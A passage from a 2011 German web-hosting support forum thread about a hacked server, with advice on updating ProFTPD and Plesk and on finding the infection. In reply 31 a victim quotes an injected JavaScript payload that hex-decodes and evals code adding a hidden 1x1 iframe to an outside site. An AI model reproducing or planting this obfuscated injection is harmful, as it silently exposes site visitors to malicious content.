Antworten: 36
|
|
palle Supporter Beiträge: 3073 |
# Antwort: 21 - 18.06.2011 um 09:43 Uhr
ja denke auch das es nen exploit gewesen sein kann. höhst unwahrscheinlich. ------------------ I like the part where it says 'nyan' |
Inaktiv |
|
Drag0n Just nerd Beiträge: 941 |
# Antwort: 22 - 18.06.2011 um 11:40 Uhr
hm... könntest du pls das clansphere aus der headline nehmen ? clansphere is in keinster weise daran schuld also is es schon ein bissien dreist den namen in die headline zu feuern. ------------------ MfG Drag0n ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an |
Inaktiv |
|
sgraewe Supporter Beiträge: 6116 |
# Antwort: 23 - 18.06.2011 um 12:01 Uhr
Hab es mal geändert |
Inaktiv |
|
Drag0n Just nerd Beiträge: 941 |
# Antwort: 24 - 18.06.2011 um 12:06 Uhr
braves equal ------------------ MfG Drag0n ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an |
Inaktiv |
|
sgraewe Supporter Beiträge: 6116 |
# Antwort: 25 - 18.06.2011 um 12:09 Uhr
Wobei ich halt immer noch das gefühl habe, das er es immer noch nicht ganz verstanden hat das es nichts mit csp zutun hat. Sonst würden ihm ja nicht ideen wie exploits kommen |
Inaktiv |
|
Drag0n Just nerd Beiträge: 941 |
# Antwort: 26 - 18.06.2011 um 16:13 Uhr
naja für einen laien is das schon ein bissien merkwürdig ------------------ MfG Drag0n ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an |
Inaktiv |
|
Fr33z3m4n Medal of Honor Herkunft: Hamm Beiträge: 11094 |
# Antwort: 27 - 20.06.2011 um 09:53 Uhr
@flyingdevil Überprüf deinen vServer welche ProFTPD Version bei dir läuft. Erst kürzlich war dort eine kritische Sicherheitslücke, die ganau so etwas ausführen kann. Des Weiteren solltest du deinen vServer auf kompromittierung überprüfen. Sollte dieser bereits kompromittiert sein, hilft nur noch Neuinstallation. Halte dein System immer uptodate. Spiele alle udpates ein. Überprüfe immer ob Plesk auf dem neustem Stand ist. Erstelle sichere Passwörter, angefangen bei 8 Zeichen, mit Sonderzeichen, Groß-Kleinschreibung und Zahlen etc. Lass dich bei Unregelmäßigkeiten von deinem vServer per eMail, SMS, ICQ o.ä. sofort informieren. Du bist bei einem vServer genauso haftbar, als wenn du einen Dedicated Server hast. Alles was darauf passiert, fällt die später zu lasten. ------------------ mfg Patrick "Fr33z3m4n" Jaskulski Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer. |
Inaktiv |
|
flyingdevil Thread-Ersteller Rock the board Beiträge: 79 |
# Antwort: 28 - 21.06.2011 um 04:57 Uhr
Ja danke ,ich habe heute schon versucht plesk zu updaten ohne erfolg, dasscheint nicht so gut zu laufen von strato. updates macht suse automatisch. Proftpd ist nicht drauf da die updates von plesk nicht funktionieren und proftpd erst mit version 9.5 drin ist. Ich hab die faxen dicke ,möchte eigentlich nen anbieter suchen der mir webspace zu nem guten preis gibt. finde da nur wucher preise. |
Inaktiv |
|
Fr33z3m4n Medal of Honor Herkunft: Hamm Beiträge: 11094 |
# Antwort: 29 - 21.06.2011 um 10:24 Uhr
Ich hab die faxen dicke ,möchte eigentlich nen anbieter suchen der mir webspace zu nem guten preis gibt. finde da nur wucher preise. Kann ich garnicht nachvollziehen. http://www.fastwebs24.de/index/fb_webspace/list/id/12 ------------------ mfg Patrick "Fr33z3m4n" Jaskulski Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer. |
Inaktiv |
|
Mindcrime Geekboy Beiträge: 1155 |
# Antwort: 30 - 21.06.2011 um 10:32 Uhr
21.06.2011 um 04:57 Uhr - flyingdevil: Ja danke ,ich habe heute schon versucht plesk zu updaten ohne erfolg, dasscheint nicht so gut zu laufen von strato. updates macht suse automatisch. Proftpd ist nicht drauf da die updates von plesk nicht funktionieren und proftpd erst mit version 9.5 drin ist. Ich hab die faxen dicke ,möchte eigentlich nen anbieter suchen der mir webspace zu nem guten preis gibt. finde da nur wucher preise. Plesk lauft nicht richtig wenn du SUSE automatisch updates machen laesst... Weil SUSE dan neuere versionen von PHP und Apache drauf haut womit Plesk nicht umgehen kan... |
Inaktiv |
|
Beckz Rock the board Beiträge: 62 |
# Antwort: 31 - 08.08.2011 um 16:58 Uhr
Ich greif das Thema noch mal auf, da wir seit mittlerweile 6 wochen das selbe Problem haben! Was bei uns auffällig ist: Bei uns liegen ca. 30 Websites auf dem Server. Die meisten Seiten sind joomla, Wordpress und Drupal Seiten und eben 2 Clansphere Seiten. Betroffen sind immer nur die beiden Clansphere Ordner! Folgendes Script schreibt sich ständig in jede html Datein und ändert Ordner und Dateizugriffsrechte auf dem FTP (nur Clansphere Ordner): <script>var t="";var arr="646f63756d656e742e777269746528 273c696672616d65207372633d22687474703a2f 2f6c6f63756d7265736f75726365732e636f6d2f 666f72756d2e7068703f74703d36373565616665 633433316231663732222077696474683d223122 206865696768743d223122206672616d65626f72 6465723d2230223e3c2f696672616d653e2729";for(i=0; i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t); </script><script>var t="";var arr="646f63756d656e742e777269746528 273c696672616d65207372633d22687474703a2f 2f6c6f63756d7265736f75726365732e636f6d2f 666f72756d2e7068703f74703d36373565616665 633433316231663732222077696474683d223122 206865696768743d223122206672616d65626f72 6465723d2230223e3c2f696672616d653e2729";for(i=0; i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t); </script><script>var t="";var arr="646f63756d656e742e777269746528 273c696672616d65207372633d22687474703a2f 2f6c6f63756d7265736f75726365732e636f6d2f 666f72756d2e7068703f74703d36373565616665 633433316231663732222077696474683d223122 206865696768743d223122206672616d65626f72 6465723d2230223e3c2f696672616d653e2729";for(i=0; i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t); </script> Ausserdem bewirkt das Script, das in der home und login.php Zeilen geändert werden bzw. Fehler eingebaut werden. Aktuell sind wir damit beschäftigt raus zu finden wie dieser Virus ständig auf unseren Rootserver kommt. Den Virus selber haben wir schon mehrfach gelöscht bekommen nur kommt er alle 4-5 Tage wieder. Das der Virus via FTP Programm sich mit einschleicht können wir fast auschließen, denn als der Virus sich das erste mal bemerkbar machte, wurde ca. 8 Wochen vorher nichts auf den Server hoch oder via FTP runter geladen. Seit 6 Wochen ändern wir auch alle 4-5 Tage (nach den Angriffen) alle Passwörter... |
Inaktiv |
|
Jam2 Highlander Beiträge: 3291 |
# Antwort: 32 - 08.08.2011 um 17:02 Uhr
Das der Virus via FTP Programm sich mit einschleicht können wir fast auschließen, denn als der Virus sich das erste mal bemerkbar machte, wurde ca. 8 Wochen vorher nichts auf den Server hoch oder via FTP runter geladen. Und wo ist der Beweiß? ------------------ Gruß/ Best regards Jam2 Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes) Template Switch for index.php Board Navlist last posts Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota..... Edi: hö ? Jam2: nichts ist unmöglich! |
Inaktiv |
|
Mindcrime Geekboy Beiträge: 1155 |
# Antwort: 33 - 08.08.2011 um 17:08 Uhr
Access logs from webserver waehren vielleicht mal angebracht wenn man sowas unterstellt... |
Inaktiv |
|
Beckz Rock the board Beiträge: 62 |
# Antwort: 34 - 08.08.2011 um 17:29 Uhr
Was ist denn nun los? Was unterstelle ich denn hier? Ich gebe euch hier Infos und werd dafür auch noch blöd angemacht??? Ich habe hier geschrieben das wir aktuell am forschen sind wie der Virus ständig auf den Server kommt... ich hab mit keinem Wort geschrieben das ich Clansphere in verdacht habe!! Ich wundere mich zwar das nur die Clansphere Ordner betroffen sind, aber auch das kann banale Gründe haben!...Das FTP Accsess Log habe ich mir noch nicht angeguckt, den Grund dafür brauche ich hier nicht näher erklären...da ich nicht kompletten Zugriff auf den Server habe, werde ich nachher das Log von dem denjenigen anfordern dem der Server gehört ... wüßte nur nicht was das bringen soll, ausser eine bestätigung |
Inaktiv |
|
Jam2 Highlander Beiträge: 3291 |
# Antwort: 35 - 08.08.2011 um 17:55 Uhr
Es hat dich hier keiner angemacht ;D ------------------ Gruß/ Best regards Jam2 Nützliche Forumbeiträge/Codepastes: (Useful comments in our board / codepastes) Template Switch for index.php Board Navlist last posts Edi: könnte man denn auch hier eine erweiterung einfügen?
Jam2: das web ist wie toyota..... Edi: hö ? Jam2: nichts ist unmöglich! |
Inaktiv |
|
hajo VIP - Poster Herkunft: Barsbüttel Beiträge: 9411 |
# Antwort: 36 - 09.08.2011 um 18:03 Uhr
das es nur mit den clansphere installationen passiert kann eigentlich schon eingrenzen, dass nur wer dort dran beteiligt ist das problem mit einschleppen könnte. für mich sieht das auch eher nach einer lücke in der ftp software aus, oder das eines der ftp konten gehacked worden ist. das ihr die kennwörter laufend ändert schließt davon auch wenn nur das zweite eher aus. schaut ihr denn mit verzeichsweisem grep bzw. allgemein suchen überall durch, ob diese code bestandteile auch anderswo auftreten und wo überall in clansphere? wäre mal interessant eine grobe übersicht darüber zu haben was betroffene dateien und und so weiter angeht. vielleicht ist das problem ja auch schon irgendwo anders aufgetreten und per google etwas dazu auffindbar. ------------------ ClanSphere - professional clan care starts here |
Offline |
|
Antworten: 36
|
Sie müssen sich registrieren, um zu antworten. |